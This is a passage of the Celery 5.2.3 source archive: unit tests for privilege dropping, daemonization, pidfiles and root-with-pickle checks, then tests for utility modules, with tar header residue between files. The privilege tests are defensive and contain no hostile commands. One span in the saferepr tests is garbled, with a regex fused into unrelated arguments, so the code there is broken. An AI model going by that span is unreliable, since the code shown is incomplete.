0 getgid.return_value = 0 setuid.side_effect = raise_on_second_call with pytest.raises(SecurityError): maybe_drop_privileges(gid='group') getuid.reset_mock() 
geteuid.reset_mock() setuid.reset_mock() getuid.side_effect = geteuid.side_effect = None def raise_on_second_call(*args, **kwargs): setuid.side_effect = OSError() setuid.side_effect.errno = errno.ENOENT setuid.side_effect = raise_on_second_call with pytest.raises(OSError): maybe_drop_privileges(uid='user') @patch('celery.platforms.parse_uid') @patch('celery.platforms.parse_gid') @patch('celery.platforms.setgid') @patch('celery.platforms.setuid') @patch('celery.platforms.initgroups') def test_with_guid(self, initgroups, setuid, setgid, parse_gid, parse_uid): def raise_on_second_call(*args, **kwargs): setuid.side_effect = OSError() setuid.side_effect.errno = errno.EPERM setuid.side_effect = raise_on_second_call parse_uid.return_value = 5001 parse_gid.return_value = 50001 maybe_drop_privileges(uid='user', gid='group') parse_uid.assert_called_with('user') parse_gid.assert_called_with('group') setgid.assert_called_with(50001) initgroups.assert_called_with(5001, 50001) setuid.assert_has_calls([call(5001), call(0)]) setuid.side_effect = None with pytest.raises(SecurityError): maybe_drop_privileges(uid='user', gid='group') setuid.side_effect = OSError() setuid.side_effect.errno = errno.EINVAL with pytest.raises(OSError): maybe_drop_privileges(uid='user', gid='group') @patch('celery.platforms.setuid') @patch('celery.platforms.setgid') @patch('celery.platforms.parse_gid') def test_only_gid(self, parse_gid, setgid, setuid): parse_gid.return_value = 50001 maybe_drop_privileges(gid='group') parse_gid.assert_called_with('group') setgid.assert_called_with(50001) setuid.assert_not_called() @t.skip.if_win32 class test_setget_uid_gid: @patch('celery.platforms.parse_uid') @patch('os.setuid') def test_setuid(self, _setuid, parse_uid): parse_uid.return_value = 5001 setuid('user') parse_uid.assert_called_with('user') _setuid.assert_called_with(5001) @patch('celery.platforms.parse_gid') @patch('os.setgid') def test_setgid(self, _setgid, parse_gid): parse_gid.return_value = 50001 setgid('group') parse_gid.assert_called_with('group') _setgid.assert_called_with(50001) def test_parse_uid_when_int(self): assert parse_uid(5001) == 5001 @patch('pwd.getpwnam') def test_parse_uid_when_existing_name(self, getpwnam): class pwent: pw_uid = 5001 getpwnam.return_value = pwent() assert parse_uid('user') == 5001 @patch('pwd.getpwnam') def test_parse_uid_when_nonexisting_name(self, getpwnam): getpwnam.side_effect = KeyError('user') with pytest.raises(KeyError): parse_uid('user') def test_parse_gid_when_int(self): assert parse_gid(50001) == 50001 @patch('grp.getgrnam') def test_parse_gid_when_existing_name(self, getgrnam): class grent: gr_gid = 50001 getgrnam.return_value = grent() assert parse_gid('group') == 50001 @patch('grp.getgrnam') def test_parse_gid_when_nonexisting_name(self, getgrnam): getgrnam.side_effect = KeyError('group') with pytest.raises(KeyError): parse_gid('group') @t.skip.if_win32 class test_initgroups: @patch('pwd.getpwuid') @patch('os.initgroups', create=True) def test_with_initgroups(self, initgroups_, getpwuid): getpwuid.return_value = ['user'] initgroups(5001, 50001) initgroups_.assert_called_with('user', 50001) @patch('celery.platforms.setgroups') @patch('grp.getgrall') @patch('pwd.getpwuid') def test_without_initgroups(self, getpwuid, getgrall, setgroups): prev = getattr(os, 'initgroups', None) try: delattr(os, 'initgroups') except AttributeError: pass try: getpwuid.return_value = ['user'] class grent: gr_mem = ['user'] def __init__(self, gid): self.gr_gid = gid getgrall.return_value = [grent(1), 
grent(2), grent(3)] initgroups(5001, 50001) setgroups.assert_called_with([1, 2, 3]) finally: if prev: os.initgroups = prev @t.skip.if_win32 class test_detached: def test_without_resource(self): prev, platforms.resource = platforms.resource, None try: with pytest.raises(RuntimeError): detached() finally: platforms.resource = prev @patch('celery.platforms._create_pidlock') @patch('celery.platforms.signals') @patch('celery.platforms.maybe_drop_privileges') @patch('os.geteuid') @patch('builtins.open') def test_default(self, open, geteuid, maybe_drop, signals, pidlock): geteuid.return_value = 0 context = detached(uid='user', gid='group') assert isinstance(context, DaemonContext) signals.reset.assert_called_with('SIGCLD') maybe_drop.assert_called_with(uid='user', gid='group') open.return_value = Mock() geteuid.return_value = 5001 context = detached(uid='user', gid='group', logfile='/foo/bar') assert isinstance(context, DaemonContext) assert context.after_chdir context.after_chdir() open.assert_called_with('/foo/bar', 'a') open.return_value.close.assert_called_with() context = detached(pidfile='/foo/bar/pid') assert isinstance(context, DaemonContext) assert context.after_chdir context.after_chdir() pidlock.assert_called_with('/foo/bar/pid') @t.skip.if_win32 class test_DaemonContext: @patch('multiprocessing.util._run_after_forkers') @patch('os.fork') @patch('os.setsid') @patch('os._exit') @patch('os.chdir') @patch('os.umask') @patch('os.close') @patch('os.closerange') @patch('os.open') @patch('os.dup2') @patch('celery.platforms.close_open_fds') def test_open(self, _close_fds, dup2, open, close, closer, umask, chdir, _exit, setsid, fork, run_after_forkers): x = DaemonContext(workdir='/opt/workdir', umask=0o22) x.stdfds = [0, 1, 2] fork.return_value = 0 with x: assert x._is_open with x: pass assert fork.call_count == 2 setsid.assert_called_with() _exit.assert_not_called() chdir.assert_called_with(x.workdir) umask.assert_called_with(0o22) dup2.assert_called() fork.reset_mock() fork.return_value = 1 x = DaemonContext(workdir='/opt/workdir') x.stdfds = [0, 1, 2] with x: pass assert fork.call_count == 1 _exit.assert_called_with(0) x = DaemonContext(workdir='/opt/workdir', fake=True) x.stdfds = [0, 1, 2] x._detach = Mock() with x: pass x._detach.assert_not_called() x.after_chdir = Mock() with x: pass x.after_chdir.assert_called_with() x = DaemonContext(workdir='/opt/workdir', umask='0755') assert x.umask == 493 x = DaemonContext(workdir='/opt/workdir', umask='493') assert x.umask == 493 x.redirect_to_null(None) with patch('celery.platforms.mputil') as mputil: x = DaemonContext(after_forkers=True) x.open() mputil._run_after_forkers.assert_called_with() x = DaemonContext(after_forkers=False) x.open() @t.skip.if_win32 class test_Pidfile: @patch('celery.platforms.Pidfile') def test_create_pidlock(self, Pidfile): p = Pidfile.return_value = Mock() p.is_locked.return_value = True p.remove_if_stale.return_value = False with conftest.stdouts() as (_, err): with pytest.raises(SystemExit): create_pidlock('/var/pid') assert 'already exists' in err.getvalue() p.remove_if_stale.return_value = True ret = create_pidlock('/var/pid') assert ret is p def test_context(self): p = Pidfile('/var/pid') p.write_pid = Mock() p.remove = Mock() with p as _p: assert _p is p p.write_pid.assert_called_with() p.remove.assert_called_with() def test_acquire_raises_LockFailed(self): p = Pidfile('/var/pid') p.write_pid = Mock() p.write_pid.side_effect = OSError() with pytest.raises(LockFailed): with p: pass @patch('os.path.exists') def 
test_is_locked(self, exists): p = Pidfile('/var/pid') exists.return_value = True assert p.is_locked() exists.return_value = False assert not p.is_locked() def test_read_pid(self): with conftest.open() as s: s.write('1816\n') s.seek(0) p = Pidfile('/var/pid') assert p.read_pid() == 1816 def test_read_pid_partially_written(self): with conftest.open() as s: s.write('1816') s.seek(0) p = Pidfile('/var/pid') with pytest.raises(ValueError): p.read_pid() def test_read_pid_raises_ENOENT(self): exc = IOError() exc.errno = errno.ENOENT with conftest.open(side_effect=exc): p = Pidfile('/var/pid') assert p.read_pid() is None def test_read_pid_raises_IOError(self): exc = IOError() exc.errno = errno.EAGAIN with conftest.open(side_effect=exc): p = Pidfile('/var/pid') with pytest.raises(IOError): p.read_pid() def test_read_pid_bogus_pidfile(self): with conftest.open() as s: s.write('eighteensixteen\n') s.seek(0) p = Pidfile('/var/pid') with pytest.raises(ValueError): p.read_pid() @patch('os.unlink') def test_remove(self, unlink): unlink.return_value = True p = Pidfile('/var/pid') p.remove() unlink.assert_called_with(p.path) @patch('os.unlink') def test_remove_ENOENT(self, unlink): exc = OSError() exc.errno = errno.ENOENT unlink.side_effect = exc p = Pidfile('/var/pid') p.remove() unlink.assert_called_with(p.path) @patch('os.unlink') def test_remove_EACCES(self, unlink): exc = OSError() exc.errno = errno.EACCES unlink.side_effect = exc p = Pidfile('/var/pid') p.remove() unlink.assert_called_with(p.path) @patch('os.unlink') def test_remove_OSError(self, unlink): exc = OSError() exc.errno = errno.EAGAIN unlink.side_effect = exc p = Pidfile('/var/pid') with pytest.raises(OSError): p.remove() unlink.assert_called_with(p.path) @patch('os.kill') def test_remove_if_stale_process_alive(self, kill): p = Pidfile('/var/pid') p.read_pid = Mock() p.read_pid.return_value = 1816 kill.return_value = 0 assert not p.remove_if_stale() kill.assert_called_with(1816, 0) p.read_pid.assert_called_with() kill.side_effect = OSError() kill.side_effect.errno = errno.ENOENT assert not p.remove_if_stale() @patch('os.kill') def test_remove_if_stale_process_dead(self, kill): with conftest.stdouts(): p = Pidfile('/var/pid') p.read_pid = Mock() p.read_pid.return_value = 1816 p.remove = Mock() exc = OSError() exc.errno = errno.ESRCH kill.side_effect = exc assert p.remove_if_stale() kill.assert_called_with(1816, 0) p.remove.assert_called_with() def test_remove_if_stale_broken_pid(self): with conftest.stdouts(): p = Pidfile('/var/pid') p.read_pid = Mock() p.read_pid.side_effect = ValueError() p.remove = Mock() assert p.remove_if_stale() p.remove.assert_called_with() @patch('os.kill') def test_remove_if_stale_unprivileged_user(self, kill): with conftest.stdouts(): p = Pidfile('/var/pid') p.read_pid = Mock() p.read_pid.return_value = 1817 p.remove = Mock() exc = OSError() exc.errno = errno.EPERM kill.side_effect = exc assert p.remove_if_stale() kill.assert_called_with(1817, 0) p.remove.assert_called_with() def test_remove_if_stale_no_pidfile(self): p = Pidfile('/var/pid') p.read_pid = Mock() p.read_pid.return_value = None p.remove = Mock() assert p.remove_if_stale() p.remove.assert_called_with() @patch('os.fsync') @patch('os.getpid') @patch('os.open') @patch('os.fdopen') @patch('builtins.open') def test_write_pid(self, open_, fdopen, osopen, getpid, fsync): getpid.return_value = 1816 osopen.return_value = 13 w = fdopen.return_value = WhateverIO() w.close = Mock() r = open_.return_value = WhateverIO() r.write('1816\n') r.seek(0) p = 
Pidfile('/var/pid')
        p.write_pid()
        w.seek(0)
        assert w.readline() == '1816\n'
        w.close.assert_called()
        getpid.assert_called_with()
        osopen.assert_called_with(
            p.path, platforms.PIDFILE_FLAGS, platforms.PIDFILE_MODE,
        )
        fdopen.assert_called_with(13, 'w')
        fsync.assert_called_with(13)
        open_.assert_called_with(p.path)

    @patch('os.fsync')
    @patch('os.getpid')
    @patch('os.open')
    @patch('os.fdopen')
    @patch('builtins.open')
    def test_write_reread_fails(self, open_, fdopen, osopen, getpid, fsync):
        getpid.return_value = 1816
        osopen.return_value = 13
        w = fdopen.return_value = WhateverIO()
        w.close = Mock()
        r = open_.return_value = WhateverIO()
        r.write('11816\n')
        r.seek(0)
        p = Pidfile('/var/pid')
        with pytest.raises(LockFailed):
            p.write_pid()


class test_setgroups:

    @patch('os.setgroups', create=True)
    def test_setgroups_hack_ValueError(self, setgroups):

        def on_setgroups(groups):
            if len(groups) <= 200:
                setgroups.return_value = True
                return
            raise ValueError()
        setgroups.side_effect = on_setgroups
        _setgroups_hack(list(range(400)))

        setgroups.side_effect = ValueError()
        with pytest.raises(ValueError):
            _setgroups_hack(list(range(400)))

    @patch('os.setgroups', create=True)
    def test_setgroups_hack_OSError(self, setgroups):
        exc = OSError()
        exc.errno = errno.EINVAL

        def on_setgroups(groups):
            if len(groups) <= 200:
                setgroups.return_value = True
                return
            raise exc
        setgroups.side_effect = on_setgroups
        _setgroups_hack(list(range(400)))

        setgroups.side_effect = exc
        with pytest.raises(OSError):
            _setgroups_hack(list(range(400)))

        exc2 = OSError()
        exc2.errno = errno.ESRCH
        setgroups.side_effect = exc2
        with pytest.raises(OSError):
            _setgroups_hack(list(range(400)))

    @t.skip.if_win32
    @patch('celery.platforms._setgroups_hack')
    def test_setgroups(self, hack):
        with patch('os.sysconf') as sysconf:
            sysconf.return_value = 100
            setgroups(list(range(400)))
            hack.assert_called_with(list(range(100)))

    @t.skip.if_win32
    @patch('celery.platforms._setgroups_hack')
    def test_setgroups_sysconf_raises(self, hack):
        with patch('os.sysconf') as sysconf:
            sysconf.side_effect = ValueError()
            setgroups(list(range(400)))
            hack.assert_called_with(list(range(400)))

    @t.skip.if_win32
    @patch('os.getgroups')
    @patch('celery.platforms._setgroups_hack')
    def test_setgroups_raises_ESRCH(self, hack, getgroups):
        with patch('os.sysconf') as sysconf:
            sysconf.side_effect = ValueError()
            esrch = OSError()
            esrch.errno = errno.ESRCH
            hack.side_effect = esrch
            with pytest.raises(OSError):
                setgroups(list(range(400)))

    @t.skip.if_win32
    @patch('os.getgroups')
    @patch('celery.platforms._setgroups_hack')
    def test_setgroups_raises_EPERM(self, hack, getgroups):
        with patch('os.sysconf') as sysconf:
            sysconf.side_effect = ValueError()
            eperm = OSError()
            eperm.errno = errno.EPERM
            hack.side_effect = eperm
            getgroups.return_value = list(range(400))
            setgroups(list(range(400)))
            getgroups.assert_called_with()

            getgroups.return_value = [1000]
            with pytest.raises(OSError):
                setgroups(list(range(400)))
            getgroups.assert_called_with()


fails_on_win32 = pytest.mark.xfail(
    sys.platform == "win32",
    reason="fails on py38+ windows",
)


@fails_on_win32
@pytest.mark.parametrize('accept_content', [
    {'pickle'},
    {'application/group-python-serialize'},
    {'pickle', 'application/group-python-serialize'},
])
@patch('celery.platforms.os')
def test_check_privileges_suspicious_platform(os_module, accept_content):
    del os_module.getuid
    del os_module.getgid
    del os_module.geteuid
    del os_module.getegid

    with pytest.raises(SecurityError,
                       match=r'suspicious platform, contact support'):
        check_privileges(accept_content)
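# --------------------------------------------------------------------------
# Editorial sketch (not part of the upstream test module): a condensed view
# of the mocking pattern the check_privileges tests above and below rely on.
# The module-level ``os`` reference inside celery.platforms is patched, so
# uid/gid/euid/egid lookups can be forced to 0 without actually running as
# root, and the C_FORCE_ROOT opt-in is controlled through the patched
# ``environ`` dict.  The helper name below is hypothetical; it mirrors the
# POSIX path exercised by these tests (on platforms without grp/pwd the
# check is skipped entirely, as the skip tests further down show), so it is
# a sketch of expected behaviour, not an additional assertion of it.
from unittest.mock import patch

from celery.exceptions import SecurityError
from celery.platforms import check_privileges


def _demo_root_with_pickle_is_refused():
    with patch('celery.platforms.os') as os_module:
        os_module.environ = {}              # no C_FORCE_ROOT opt-in
        os_module.getuid.return_value = 0   # pretend the worker runs as root
        os_module.getgid.return_value = 0
        os_module.geteuid.return_value = 0
        os_module.getegid.return_value = 0
        try:
            check_privileges({'pickle'})
        except SecurityError:
            return True                     # root + pickle content is refused
    return False
# --------------------------------------------------------------------------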
@pytest.mark.parametrize('accept_content', [
    {'pickle'},
    {'application/group-python-serialize'},
    {'pickle', 'application/group-python-serialize'}
])
def test_check_privileges(accept_content, recwarn):
    check_privileges(accept_content)

    assert len(recwarn) == 0


@pytest.mark.parametrize('accept_content', [
    {'pickle'},
    {'application/group-python-serialize'},
    {'pickle', 'application/group-python-serialize'}
])
@patch('celery.platforms.os')
def test_check_privileges_no_fchown(os_module, accept_content, recwarn):
    del os_module.fchown
    check_privileges(accept_content)

    assert len(recwarn) == 0


@fails_on_win32
@pytest.mark.parametrize('accept_content', [
    {'pickle'},
    {'application/group-python-serialize'},
    {'pickle', 'application/group-python-serialize'}
])
@patch('celery.platforms.os')
def test_check_privileges_without_c_force_root(os_module, accept_content):
    os_module.environ = {}
    os_module.getuid.return_value = 0
    os_module.getgid.return_value = 0
    os_module.geteuid.return_value = 0
    os_module.getegid.return_value = 0

    expected_message = re.escape(ROOT_DISALLOWED.format(uid=0, euid=0,
                                                        gid=0, egid=0))
    with pytest.raises(SecurityError, match=expected_message):
        check_privileges(accept_content)


@fails_on_win32
@pytest.mark.parametrize('accept_content', [
    {'pickle'},
    {'application/group-python-serialize'},
    {'pickle', 'application/group-python-serialize'}
])
@patch('celery.platforms.os')
def test_check_privileges_with_c_force_root(os_module, accept_content):
    os_module.environ = {'C_FORCE_ROOT': 'true'}
    os_module.getuid.return_value = 0
    os_module.getgid.return_value = 0
    os_module.geteuid.return_value = 0
    os_module.getegid.return_value = 0

    with pytest.warns(SecurityWarning):
        check_privileges(accept_content)


@fails_on_win32
@pytest.mark.parametrize(('accept_content', 'group_name'), [
    ({'pickle'}, 'sudo'),
    ({'application/group-python-serialize'}, 'sudo'),
    ({'pickle', 'application/group-python-serialize'}, 'sudo'),
    ({'pickle'}, 'wheel'),
    ({'application/group-python-serialize'}, 'wheel'),
    ({'pickle', 'application/group-python-serialize'}, 'wheel'),
])
@patch('celery.platforms.os')
@patch('celery.platforms.grp')
def test_check_privileges_with_c_force_root_and_with_suspicious_group(
    grp_module, os_module, accept_content, group_name
):
    os_module.environ = {'C_FORCE_ROOT': 'true'}
    os_module.getuid.return_value = 60
    os_module.getgid.return_value = 60
    os_module.geteuid.return_value = 60
    os_module.getegid.return_value = 60

    grp_module.getgrgid.return_value = [group_name]

    expected_message = re.escape(ROOT_DISCOURAGED.format(uid=60, euid=60,
                                                         gid=60, egid=60))
    with pytest.warns(SecurityWarning, match=expected_message):
        check_privileges(accept_content)


@fails_on_win32
@pytest.mark.parametrize(('accept_content', 'group_name'), [
    ({'pickle'}, 'sudo'),
    ({'application/group-python-serialize'}, 'sudo'),
    ({'pickle', 'application/group-python-serialize'}, 'sudo'),
    ({'pickle'}, 'wheel'),
    ({'application/group-python-serialize'}, 'wheel'),
    ({'pickle', 'application/group-python-serialize'}, 'wheel'),
])
@patch('celery.platforms.os')
@patch('celery.platforms.grp')
def test_check_privileges_without_c_force_root_and_with_suspicious_group(
    grp_module, os_module, accept_content, group_name
):
    os_module.environ = {}
    os_module.getuid.return_value = 60
    os_module.getgid.return_value = 60
    os_module.geteuid.return_value = 60
    os_module.getegid.return_value = 60

    grp_module.getgrgid.return_value = [group_name]

    expected_message =
re.escape(ROOT_DISALLOWED.format(uid=60, euid=60, gid=60, egid=60)) with pytest.raises(SecurityError, match=expected_message): check_privileges(accept_content) @fails_on_win32 @pytest.mark.parametrize('accept_content', [ {'pickle'}, {'application/group-python-serialize'}, {'pickle', 'application/group-python-serialize'} ]) @patch('celery.platforms.os') @patch('celery.platforms.grp') def test_check_privileges_with_c_force_root_and_no_group_entry( grp_module, os_module, accept_content, recwarn ): os_module.environ = {'C_FORCE_ROOT': 'true'} os_module.getuid.return_value = 60 os_module.getgid.return_value = 60 os_module.geteuid.return_value = 60 os_module.getegid.return_value = 60 grp_module.getgrgid.side_effect = KeyError expected_message = ROOT_DISCOURAGED.format(uid=60, euid=60, gid=60, egid=60) check_privileges(accept_content) assert len(recwarn) == 2 assert recwarn[0].message.args[0] == ASSUMING_ROOT assert recwarn[1].message.args[0] == expected_message @fails_on_win32 @pytest.mark.parametrize('accept_content', [ {'pickle'}, {'application/group-python-serialize'}, {'pickle', 'application/group-python-serialize'} ]) @patch('celery.platforms.os') @patch('celery.platforms.grp') def test_check_privileges_without_c_force_root_and_no_group_entry( grp_module, os_module, accept_content, recwarn ): os_module.environ = {} os_module.getuid.return_value = 60 os_module.getgid.return_value = 60 os_module.geteuid.return_value = 60 os_module.getegid.return_value = 60 grp_module.getgrgid.side_effect = KeyError expected_message = re.escape(ROOT_DISALLOWED.format(uid=60, euid=60, gid=60, egid=60)) with pytest.raises(SecurityError, match=expected_message): check_privileges(accept_content) assert recwarn[0].message.args[0] == ASSUMING_ROOT def test_skip_checking_privileges_when_grp_is_unavailable(recwarn): with patch("celery.platforms.grp", new=None): check_privileges({'pickle'}) assert len(recwarn) == 0 def test_skip_checking_privileges_when_pwd_is_unavailable(recwarn): with patch("celery.platforms.pwd", new=None): check_privileges({'pickle'}) assert len(recwarn) == 0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_saferepr.py0000664000175000017500000001266300000000000020507 0ustar00asifasif00000000000000import ast import re import struct from decimal import Decimal from pprint import pprint import pytest from celery.utils.saferepr import saferepr D_NUMBERS = { b'integer': 1, b'float': 1.3, b'decimal': Decimal('1.3'), b'long': 4, b'complex': complex(13.3), } D_INT_KEYS = {v: k for k, v in D_NUMBERS.items()} QUICK_BROWN_FOX = 'The quick brown fox jumps over the lazy dog.' B_QUICK_BROWN_FOX = b'The quick brown fox jumps over the lazy dog.' 
D_TEXT = { b'foo': QUICK_BROWN_FOX, b'bar': B_QUICK_BROWN_FOX, b'baz': B_QUICK_BROWN_FOX, b'xuzzy': B_QUICK_BROWN_FOX, } L_NUMBERS = list(D_NUMBERS.values()) D_TEXT_LARGE = { b'bazxuzzyfoobarlongverylonglong': QUICK_BROWN_FOX * 30, } D_ALL = { b'numbers': D_NUMBERS, b'intkeys': D_INT_KEYS, b'text': D_TEXT, b'largetext': D_TEXT_LARGE, } D_D_TEXT = {b'rest': D_TEXT} RE_OLD_SET_REPR = re.compile(r'(?QQQ', 12223, 1234, 3123) if hasattr(bytes, 'hex'): # Python 3.5+ assert '2fbf' in saferepr(val, maxlen=128) else: # Python 3.4 assert saferepr(val, maxlen=128) def test_binary_bytes__long(self): val = struct.pack('>QQQ', 12223, 1234, 3123) * 1024 result = saferepr(val, maxlen=128) assert '2fbf' in result assert result.endswith("...'") def test_repr_raises(self): class O: def __repr__(self): raise KeyError('foo') assert 'Unrepresentable' in saferepr(O()) def test_bytes_with_unicode_py2_and_3(self): assert saferepr([b'foo', 'a®rgs'.encode()]) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/utils/test_serialization.py0000664000175000017500000000651300000000000021552 0ustar00asifasif00000000000000import json import pickle import sys from datetime import date, datetime, time, timedelta from unittest.mock import Mock import pytest import pytz from kombu import Queue from celery.utils.serialization import (STRTOBOOL_DEFAULT_TABLE, UnpickleableExceptionWrapper, ensure_serializable, get_pickleable_etype, jsonify, strtobool) class test_AAPickle: @pytest.mark.masked_modules('cPickle') def test_no_cpickle(self, mask_modules): prev = sys.modules.pop('celery.utils.serialization', None) try: import pickle as orig_pickle from celery.utils.serialization import pickle assert pickle.dumps is orig_pickle.dumps finally: sys.modules['celery.utils.serialization'] = prev class test_ensure_serializable: def test_json_py3(self): expected = (1, "") actual = ensure_serializable([1, object], encoder=json.dumps) assert expected == actual def test_pickle(self): expected = (1, object) actual = ensure_serializable(expected, encoder=pickle.dumps) assert expected == actual class test_UnpickleExceptionWrapper: def test_init(self): x = UnpickleableExceptionWrapper('foo', 'Bar', [10, lambda x: x]) assert x.exc_args assert len(x.exc_args) == 2 class test_get_pickleable_etype: def test_get_pickleable_etype(self): class Unpickleable(Exception): def __reduce__(self): raise ValueError('foo') assert get_pickleable_etype(Unpickleable) is Exception class test_jsonify: @pytest.mark.parametrize('obj', [ Queue('foo'), ['foo', 'bar', 'baz'], {'foo': 'bar'}, datetime.utcnow(), datetime.utcnow().replace(tzinfo=pytz.utc), datetime.utcnow().replace(microsecond=0), date(2012, 1, 1), time(hour=1, minute=30), time(hour=1, minute=30, microsecond=3), timedelta(seconds=30), 10, 10.3, 'hello', ]) def test_simple(self, obj): assert jsonify(obj) def test_unknown_type_filter(self): unknown_type_filter = Mock() obj = object() assert (jsonify(obj, unknown_type_filter=unknown_type_filter) is unknown_type_filter.return_value) unknown_type_filter.assert_called_with(obj) with pytest.raises(ValueError): jsonify(obj) class test_strtobool: @pytest.mark.parametrize('s,b', STRTOBOOL_DEFAULT_TABLE.items()) def test_default_table(self, s, b): assert strtobool(s) == b def test_unknown_value(self): with pytest.raises(TypeError, # todo replace below when dropping python 2.7 # match="Cannot coerce 'foo' to type bool"): match=r"Cannot coerce u?'foo' to type bool"): strtobool('foo') def 
test_no_op(self): assert strtobool(1) == 1 def test_custom_table(self): custom_table = { 'foo': True, 'bar': False } assert strtobool("foo", table=custom_table) assert not strtobool("bar", table=custom_table) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_sysinfo.py0000664000175000017500000000135700000000000020370 0ustar00asifasif00000000000000import importlib import os import pytest from celery.utils.sysinfo import df, load_average try: posix = importlib.import_module('posix') except Exception: posix = None @pytest.mark.skipif( not hasattr(os, 'getloadavg'), reason='Function os.getloadavg is not defined' ) def test_load_average(patching): getloadavg = patching('os.getloadavg') getloadavg.return_value = 0.54736328125, 0.6357421875, 0.69921875 l = load_average() assert l assert l == (0.55, 0.64, 0.7) @pytest.mark.skipif( not hasattr(posix, 'statvfs_result'), reason='Function posix.statvfs_result is not defined' ) def test_df(): x = df('/') assert x.total_blocks assert x.available assert x.capacity assert x.stat ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_term.py0000664000175000017500000000330600000000000017641 0ustar00asifasif00000000000000import pytest import t.skip from celery.utils import term from celery.utils.term import colored, fg @t.skip.if_win32 class test_colored: @pytest.fixture(autouse=True) def preserve_encoding(self, patching): patching('sys.getdefaultencoding', 'utf-8') @pytest.mark.parametrize('name,color', [ ('black', term.BLACK), ('red', term.RED), ('green', term.GREEN), ('yellow', term.YELLOW), ('blue', term.BLUE), ('magenta', term.MAGENTA), ('cyan', term.CYAN), ('white', term.WHITE), ]) def test_colors(self, name, color): assert fg(30 + color) in str(colored().names[name]('foo')) @pytest.mark.parametrize('name', [ 'bold', 'underline', 'blink', 'reverse', 'bright', 'ired', 'igreen', 'iyellow', 'iblue', 'imagenta', 'icyan', 'iwhite', 'reset', ]) def test_modifiers(self, name): assert str(getattr(colored(), name)('f')) def test_unicode(self): assert str(colored().green('∂bar')) assert colored().red('éefoo') + colored().green('∂bar') assert colored().red('foo').no_color() == 'foo' def test_repr(self): assert repr(colored().blue('åfoo')) assert "''" in repr(colored()) def test_more_unicode(self): c = colored() s = c.red('foo', c.blue('bar'), c.green('baz')) assert s.no_color() c._fold_no_color(s, 'øfoo') c._fold_no_color('fooå', s) c = colored().red('åfoo') assert c._add(c, 'baræ') == '\x1b[1;31m\xe5foo\x1b[0mbar\xe6' c2 = colored().blue('ƒƒz') c3 = c._add(c, c2) assert c3 == '\x1b[1;31m\xe5foo\x1b[0m\x1b[1;34m\u0192\u0192z\x1b[0m' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_text.py0000664000175000017500000000366000000000000017661 0ustar00asifasif00000000000000import pytest from celery.utils.text import (abbr, abbrtask, ensure_newlines, indent, pretty, truncate) RANDTEXT = """\ The quick brown fox jumps over the lazy dog\ """ RANDTEXT_RES = """\ The quick brown fox jumps over the lazy dog\ """ QUEUES = { 'queue1': { 'exchange': 'exchange1', 'exchange_type': 'type1', 'routing_key': 'bind1', }, 'queue2': { 'exchange': 'exchange2', 'exchange_type': 'type2', 'routing_key': 'bind2', }, } QUEUE_FORMAT1 = '.> queue1 exchange=exchange1(type1) key=bind1' QUEUE_FORMAT2 = '.> queue2 exchange=exchange2(type2) 
key=bind2' class test_Info: def test_textindent(self): assert indent(RANDTEXT, 4) == RANDTEXT_RES def test_format_queues(self, app): app.amqp.queues = app.amqp.Queues(QUEUES) assert (sorted(app.amqp.queues.format().split('\n')) == sorted([QUEUE_FORMAT1, QUEUE_FORMAT2])) def test_ensure_newlines(self): assert len(ensure_newlines('foo\nbar\nbaz\n').splitlines()) == 3 assert len(ensure_newlines('foo\nbar').splitlines()) == 2 @pytest.mark.parametrize('s,maxsize,expected', [ ('ABCDEFGHI', 3, 'ABC...'), ('ABCDEFGHI', 10, 'ABCDEFGHI'), ]) def test_truncate_text(s, maxsize, expected): assert truncate(s, maxsize) == expected @pytest.mark.parametrize('args,expected', [ ((None, 3), '???'), (('ABCDEFGHI', 6), 'ABC...'), (('ABCDEFGHI', 20), 'ABCDEFGHI'), (('ABCDEFGHI', 6, None), 'ABCDEF'), ]) def test_abbr(args, expected): assert abbr(*args) == expected @pytest.mark.parametrize('s,maxsize,expected', [ (None, 3, '???'), ('feeds.tasks.refresh', 10, '[.]refresh'), ('feeds.tasks.refresh', 30, 'feeds.tasks.refresh'), ]) def test_abbrtask(s, maxsize, expected): assert abbrtask(s, maxsize) == expected def test_pretty(): assert pretty(('a', 'b', 'c')) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/utils/test_threads.py0000664000175000017500000000463700000000000020334 0ustar00asifasif00000000000000from unittest.mock import patch import pytest from celery.utils.threads import (Local, LocalManager, _FastLocalStack, _LocalStack, bgThread) from t.unit import conftest class test_bgThread: def test_crash(self): class T(bgThread): def body(self): raise KeyError() with patch('os._exit') as _exit: with conftest.stdouts(): _exit.side_effect = ValueError() t = T() with pytest.raises(ValueError): t.run() _exit.assert_called_with(1) def test_interface(self): x = bgThread() with pytest.raises(NotImplementedError): x.body() class test_Local: def test_iter(self): x = Local() x.foo = 'bar' ident = x.__ident_func__() assert (ident, {'foo': 'bar'}) in list(iter(x)) delattr(x, 'foo') assert (ident, {'foo': 'bar'}) not in list(iter(x)) with pytest.raises(AttributeError): delattr(x, 'foo') assert x(lambda: 'foo') is not None class test_LocalStack: def test_stack(self): x = _LocalStack() assert x.pop() is None x.__release_local__() ident = x.__ident_func__ x.__ident_func__ = ident with pytest.raises(RuntimeError): x()[0] x.push(['foo']) assert x()[0] == 'foo' x.pop() with pytest.raises(RuntimeError): x()[0] class test_FastLocalStack: def test_stack(self): x = _FastLocalStack() x.push(['foo']) x.push(['bar']) assert x.top == ['bar'] assert len(x) == 2 x.pop() assert x.top == ['foo'] x.pop() assert x.top is None class test_LocalManager: def test_init(self): x = LocalManager() assert x.locals == [] assert x.ident_func def ident(): return 1 loc = Local() x = LocalManager([loc], ident_func=ident) assert x.locals == [loc] x = LocalManager(loc, ident_func=ident) assert x.locals == [loc] assert x.ident_func is ident assert x.locals[0].__ident_func__ is ident assert x.get_ident() == 1 with patch('celery.utils.threads.release_local') as release: x.cleanup() release.assert_called_with(loc) assert repr(x) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 